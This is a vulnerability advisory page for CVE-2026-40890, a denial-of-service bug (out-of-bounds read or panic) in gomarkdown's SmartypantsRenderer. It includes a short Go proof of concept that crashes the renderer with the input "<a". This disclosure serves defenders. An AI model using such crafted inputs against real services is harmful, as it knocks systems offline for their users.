Sign In

CVE-2026-40890

ADVISORY - github

Summary

Summary

Processing a malformed input containing a < character that is not followed by a > character anywhere in the remaining text with a SmartypantsRenderer will lead to Out of Bounds read or a panic.

Details

The smartLeftAngle() function in html/smartypants.go:367-376 performs an out-of-bounds slice operation when processing a < character that is not followed by a > character anywhere in the remaining text. https://github.com/gomarkdown/markdown/blob/37c66b85d6ab025ba67a73ba03b7f3ef55859cca/html/smartypants.go#L367-L376 If the length of the slice is lower than its capacity, this leads to an extra byte of data read. If the length equals the capacity, this leads to a panic.

PoC

package main

import (
    "bytes"
    "fmt"

    "github.com/gomarkdown/markdown/html"
)

func main() {
    src := []byte("<a")

    fmt.Printf("Input: %q  (len=%d, cap=%d)\n", src, len(src), cap(src))

    var buf bytes.Buffer
    sp := html.NewSmartypantsRenderer(html.Smartypants)
    sp.Process(&buf, src) // panics: slice bounds out of range

    fmt.Printf("Output: %q\n", buf.String())
}

Impact

This vulnerability will lead to a Denial of Service / panic on the processing service.

-- The Datadog Security Team

Common Weakness Enumeration (CWE)

ADVISORY - nist

CWE-125

Out-of-bounds Read

ADVISORY - github

CWE-125

Out-of-bounds Read

Impacted images

Advisories
Sign in to Docker Scout

See which of your images are affected by this CVE and how to fix them by signing into Docker Scout.

Sign in